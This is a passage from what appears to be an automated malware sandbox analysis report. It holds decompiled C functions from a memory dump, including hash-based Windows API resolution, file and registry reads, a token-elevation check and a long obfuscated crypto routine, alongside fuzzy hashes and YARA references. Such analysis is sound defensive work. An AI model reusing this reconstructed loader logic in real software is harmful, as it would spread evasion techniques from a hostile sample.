					if(E6EF53064(0x8e844d1e, 0xba53868) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6ef55e14
0x6ef55e15
0x6ef55e17
0x6ef55e1d
0x6ef55e1f
0x6ef55e23
0x6ef55e23
0x6ef55e27
0x6ef55e33
0x6ef55e67
0x6ef55e67
0x00000000
0x6ef55e35
0x6ef55e3a
0x6ef55e3b
0x6ef55e4f
0x6ef55e60
0x6ef55e51
0x6ef55e5c
0x6ef55e5c
0x6ef55e65
0x6ef55e6d
0x6ef55e6f
0x6ef55e72
0x6ef55e77
0x6ef55e77
0x6ef55e7b
0x6ef55e80
0x00000000
0x00000000
0x00000000
0x6ef55e65

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6EF55D48,?,?), ref: 6EF55E5C

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction ID: f6936f54b298f72335ff5e16c4b4107cefae64d72ef01aefb8b02cd9d5d6ff39
Opcode Fuzzy Hash: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction Fuzzy Hash: 0DF07D31A18B11BBD79159BCAC60B8773E8DFF1750F304F69F540A7344E77094608260

Uniqueness

Uniqueness Score: -1.00%

Function 6EF55E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EF55E84(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6EF4C280(_t19) == 0) {
					_v12 = _a8;
					if(E6EF53064(0x8e844d1e, 0xed3ed1cc) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6EF535F0(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6ef55e87
0x6ef55e89
0x6ef55e95
0x6ef55e9f
0x6ef55eb5
0x6ef55ed4
0x6ef55eb7
0x6ef55ec8
0x6ef55ecc
0x6ef55eec
0x6ef55ece
0x6ef55ece
0x6ef55ece
0x6ef55ecc
0x6ef55ed5
0x6ef55eda
0x6ef55ee3
0x6ef55edc
0x6ef55edc
0x6ef55ede
0x6ef55ede
0x6ef55e97
0x6ef55e97
0x6ef55e97
0x6ef55ee9

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6EF55D79,00000000,?,00000000,?), ref: 6EF55EC8

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction ID: afdccafc7000c35318e07ebbd5839ec79f2f8ed60b9c08219e5743b4982b84f8
Opcode Fuzzy Hash: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction Fuzzy Hash: 1BF0F931218313EFD791EEA98C30AAB77D8AF75240F204C6EA895C2340EB32D424C721

Uniqueness

Uniqueness Score: -1.00%

Function 6EF5564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EF5564C(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6EF53064(0x150c05fc, 0xed2313f7) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6EF4E644(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6ef55656
0x6ef55658
0x6ef5565f
0x6ef55661
0x6ef55665
0x6ef55667
0x6ef5566a
0x6ef5566d
0x6ef5566d
0x6ef55687
0x00000000
0x00000000
0x6ef55698
0x6ef5569c
0x00000000
0x00000000
0x6ef556aa
0x6ef556ad
0x6ef556b2
0x6ef556b7
0x6ef556b7

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6EF55698

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction ID: 7e5a64eede94a88af661d36d027ae39ecb07fa8ab0f2cb4b094a1d7b10972f02
Opcode Fuzzy Hash: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction Fuzzy Hash: 8DF0C8B510030AAFE7249E5ACC64DB7BBFCDBE1B54F00851EA4D542200EA31AC64C970

Uniqueness

Uniqueness Score: -1.00%

Function 6EF51030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6EF51030(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6EF5306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6EF5306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x150c05f8
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6ef5103e
0x6ef51040
0x6ef5104e
0x6ef51052
0x6ef5109b
0x00000000
0x6ef5109b
0x6ef51057
0x6ef51058
0x6ef5105a
0x6ef5105f
0x00000000
0x6ef51078
0x6ef5107c
0x6ef51089
0x6ef5108d
0x00000000
0x00000000
0x00000000
0x6ef51096

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6EF51089

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction ID: 28f63fe896209695ff75beefab660848e4c1240dbe678c983a7aa9850f4e6f78
Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction Fuzzy Hash: F3F0A470244B43ABEA40A9BC9C74F3F32AD5BE2754F408828B540CB294DB34D8198221

Uniqueness

Uniqueness Score: -1.00%

Function 6EF53628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6EF53628(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6ef5d228 == 0xa33c83e5) {
					_t7 = E6EF53064(0x60a28c5c, 0x1c6ef387);
					 *0x6ef5d22c = E6EF53064(0x60a28c5c, 0x5e0afaa3);
					if( *0x6ef5d228 == 0xa33c83e5) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6ef5d228 = 0;
					}
				}
				_t3 = E6EF53064(0x60a28c5c, 0x45b68b68);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6ef5d228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6ef53630
0x6ef53638
0x6ef5366b
0x6ef5367c
0x6ef53687
0x6ef53692
0x6ef53694
0x6ef53694
0x6ef53687
0x6ef53644
0x6ef5364b
0x00000000
0x6ef5364d
0x6ef5364d
0x6ef5364e
0x6ef53650
0x6ef53652
0x6ef53653
0x00000000
0x6ef53653

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6EF4DE09,?,?), ref: 6EF53692

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: e5b51db8626f305a2a4eed81404933514f07fcb232291120716fc093221b05e7
Instruction ID: 1bf1679bcb922819c569eb0ef5e5452944caea8620a98bb900f0eb5141a7da9e
Opcode Fuzzy Hash: e5b51db8626f305a2a4eed81404933514f07fcb232291120716fc093221b05e7
Instruction Fuzzy Hash: 66F0E934157391BFEAA019EEEC28D52A698EFB5659F400C3FF284E6308D6B18460D635

Uniqueness

Uniqueness Score: -1.00%

Function 01071DA4, Relevance: 1.4, APIs: 1, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 01071E26

Memory Dump Source

Source File: 00000000.00000002.773825191.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9abfec4f2219ceb8bd6941409b0cde3205cbf0399fecb126e3470253f61ba73f
Instruction ID: 008de948c7f520973c90fbeefed30a6c223b4bfbdce4e47e216a6f7abb51b84d
Opcode Fuzzy Hash: 9abfec4f2219ceb8bd6941409b0cde3205cbf0399fecb126e3470253f61ba73f
Instruction Fuzzy Hash: 4641F5B1E0521A9FDB04DFA8D494AAEBBF1FF48314F14852DE848AB340D375A840CF84

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6EF41494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6EF41494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6EF4F584( &_v72, 0);
				_v60 = 0xe7942190;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v76, E6EF4F4CC( &_v76) + 0x10);
				E6EF4F4BC( &_v80, E6EF4F4CC( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v84, E6EF4F4CC(_t325) + 0x10);
				E6EF4F4BC( &_v88, E6EF4F4CC( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v92, E6EF4F4CC(_t329) + 0x10);
				E6EF4F4BC( &_v96, E6EF4F4CC( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v100, E6EF4F4CC(_t333) + 0x10);
				E6EF4F4BC( &_v104, E6EF4F4CC( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v108, E6EF4F4CC(_t337) + 0x10);
				E6EF4F4BC( &_v112, E6EF4F4CC( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v116, E6EF4F4CC(_t341) + 0x10);
				E6EF4F4BC( &_v120, E6EF4F4CC( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v124, E6EF4F4CC(_t345) + 0x10);
				E6EF4F4BC( &_v128, E6EF4F4CC( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v132, E6EF4F4CC(_t349) + 0x10);
				E6EF4F4BC( &_v136, E6EF4F4CC( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v140, E6EF4F4CC(_t353) + 0x10);
				E6EF4F4BC( &_v144, E6EF4F4CC( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v148, E6EF4F4CC(_t357) + 0x10);
				E6EF4F4BC( &_v152, E6EF4F4CC( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v156, E6EF4F4CC(_t361) + 0x10);
				E6EF4F4BC( &_v160, E6EF4F4CC( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v164, E6EF4F4CC(_t365) + 0x10);
				E6EF4F4BC( &_v168, E6EF4F4CC( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v172, E6EF4F4CC(_t369) + 0x10);
				E6EF4F4BC( &_v176, E6EF4F4CC( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v180, E6EF4F4CC(_t373) + 0x10);
				E6EF4F4BC( &_v184, E6EF4F4CC( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v188, E6EF4F4CC(_t377) + 0x10);
				E6EF4F4BC( &_v192, E6EF4F4CC( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v196, E6EF4F4CC(_t381) + 0x10);
				E6EF4F4BC( &_v200, E6EF4F4CC( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v204, E6EF4F4CC(_t385) + 0x10);
				E6EF4F4BC( &_v208, E6EF4F4CC( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6EF54200(0x60a28c5c, _t434);
				E6EF4F4BC( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6EF4F4BC( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6EF4F4BC( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6EF4F4BC( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6EF4F4BC( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6EF4F4BC( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6EF4F4BC( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6EF4F4BC( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6EF4F4BC( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6EF4F4BC( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6EF4F4BC( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6EF4F4BC( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6EF4F4BC( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6EF4F4BC( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6EF4F4BC( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6EF4F4BC( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6EF4F4BC( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6EF41D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6EF4B27C( &_v248, _v256, _t481, _v252, _t318);
				E6EF4F840( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v296, E6EF4F4CC(_t410) + 0x10);
				E6EF4F4BC( &_v300, E6EF4F4CC( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v304, E6EF4F4CC(_t414) + 0x10);
				E6EF4F4BC( &_v308, E6EF4F4CC( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v312, E6EF4F4CC(_t418) + 0x10);
				E6EF4F4BC( &_v316, E6EF4F4CC( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
				asm("movq [ecx+0x18], xmm0");
				E6EF4F828( &_v320, E6EF4F4CC(_t422) + 0x10);
				E6EF4F4BC( &_v324, E6EF4F4CC( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6EF4B9FC(_t154,  *_t480);
				E6EF4F4BC( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6EF4F4BC( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6EF4F4BC( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6EF4F4BC( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6EF4F654( &_v316);
				return E6EF4F654( &_v356);
			}

0x6ef41494
0x6ef41498
0x6ef4149d
0x6ef414a3
0x6ef414ab
0x6ef414b0
0x6ef414bc
0x6ef414c0
0x6ef414d2
0x6ef414e8
0x6ef414f3
0x6ef414f4
0x6ef414f5
0x6ef414f6
0x6ef414f7
0x6ef414fa
0x6ef414fe
0x6ef41502
0x6ef41509
0x6ef4151b
0x6ef41531
0x6ef4153c
0x6ef4153d
0x6ef4153e
0x6ef4153f
0x6ef41540
0x6ef41543
0x6ef41547
0x6ef4154b
0x6ef41552
0x6ef41564
0x6ef4157a
0x6ef41585
0x6ef41586
0x6ef41587
0x6ef41588
0x6ef41589
0x6ef4158c
0x6ef41590
0x6ef41594
0x6ef4159b
0x6ef415ad
0x6ef415c3
0x6ef415ce
0x6ef415cf
0x6ef415d0
0x6ef415d1
0x6ef415d2
0x6ef415d5
0x6ef415d9
0x6ef415dd
0x6ef415e4
0x6ef415f6
0x6ef4160c
0x6ef41617
0x6ef41618
0x6ef41619
0x6ef4161a
0x6ef4161b
0x6ef4161e
0x6ef41622
0x6ef41626
0x6ef4162d
0x6ef4163f
0x6ef41655
0x6ef41660
0x6ef41661
0x6ef41662
0x6ef41663
0x6ef41664
0x6ef41667
0x6ef4166b
0x6ef4166f
0x6ef41676
0x6ef41688
0x6ef4169e
0x6ef416a9
0x6ef416aa
0x6ef416ab
0x6ef416ac
0x6ef416ad
0x6ef416b0
0x6ef416b4
0x6ef416b8
0x6ef416bf
0x6ef416d1
0x6ef416e7
0x6ef416f2
0x6ef416f3
0x6ef416f4
0x6ef416f5
0x6ef416f6
0x6ef416f9
0x6ef416fd
0x6ef41701
0x6ef41708
0x6ef4171a
0x6ef41730
0x6ef4173b
0x6ef4173c
0x6ef4173d
0x6ef4173e
0x6ef4173f
0x6ef41742
0x6ef41746
0x6ef4174a
0x6ef41751
0x6ef41763
0x6ef41779
0x6ef41784
0x6ef41785
0x6ef41786
0x6ef41787
0x6ef41788
0x6ef4178b
0x6ef4178f
0x6ef41793
0x6ef4179a
0x6ef417ac
0x6ef417c2
0x6ef417cd
0x6ef417ce
0x6ef417cf
0x6ef417d0
0x6ef417d1
0x6ef417d4
0x6ef417d8
0x6ef417dc
0x6ef417e3
0x6ef417f5
0x6ef4180b
0x6ef41816
0x6ef41817
0x6ef41818
0x6ef41819
0x6ef4181a
0x6ef4181d
0x6ef41821
0x6ef41825
0x6ef4182c
0x6ef4183e
0x6ef41854
0x6ef4185f
0x6ef41860
0x6ef41861
0x6ef41862
0x6ef41863
0x6ef41866
0x6ef4186a
0x6ef4186e
0x6ef41875
0x6ef41887
0x6ef4189d
0x6ef418a8
0x6ef418a9
0x6ef418aa
0x6ef418ab
0x6ef418ac
0x6ef418af
0x6ef418b3
0x6ef418b7
0x6ef418be
0x6ef418d0
0x6ef418e6
0x6ef418f1
0x6ef418f2
0x6ef418f3
0x6ef418f4
0x6ef418f5
0x6ef418f8
0x6ef418fc
0x6ef41900
0x6ef41907
0x6ef41919
0x6ef4192f
0x6ef4193a
0x6ef4193b
0x6ef4193c
0x6ef4193d
0x6ef4193e
0x6ef41941
0x6ef41945
0x6ef41949
0x6ef41950
0x6ef41962
0x6ef41978
0x6ef41983
0x6ef41984
0x6ef41985
0x6ef41986
0x6ef4198c
0x6ef4198f
